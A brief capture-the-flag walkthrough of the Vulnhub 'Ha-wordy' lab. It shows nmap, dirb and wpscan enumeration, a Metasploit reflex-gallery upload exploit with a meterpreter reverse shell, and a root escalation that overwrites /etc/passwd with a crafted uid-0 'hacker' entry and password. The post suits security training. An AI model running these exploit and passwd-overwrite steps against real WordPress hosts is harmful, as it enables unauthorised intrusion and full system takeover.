Vulnhub Ha-wordy Walkthrough

Scanning the box with nmap –A –T4 –p- 192.168.1.10 –vv

Now we scan it with dirb http://192.168.1.10 /usr/share/dirb/wordlists/big.txt

As we can see the box is running a WordPress service so we going to scan it with wpscan –url http://192.168.1.10/wordpress -e

Running the command again but with enumerating plugins came with:

One of the plugins reflex-gallery is an exploit we can use it in Metasploit if we search for reflex-gallery:

use exploit/unix/webapp/wp_reflexgallery_file_upload

set target /wordpress

set payload php/meterpreter/reverse_tcp

cd /home/raj and cat the flag

Next is using the LinEnum.sh script and it came through:

as we can see, we can use cp command, so we are going to copy our passwd file to the box and replace it so we can become root,

we can create a new user on our machine with root privilege to become root.

Now add the user and hash at the end of the passwd file and copy it to your home folder

hacker:$1$hacker$6luIRwdGpBvXdP.GMwcZp/:0:0:root:/root:/bin/bash

Now we’ve created a new user hacker, we going to copy our passwd file to the target box using python –m SimpleHTTPServer 80:

Now just type su hacker then the password 123456 and you are root

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s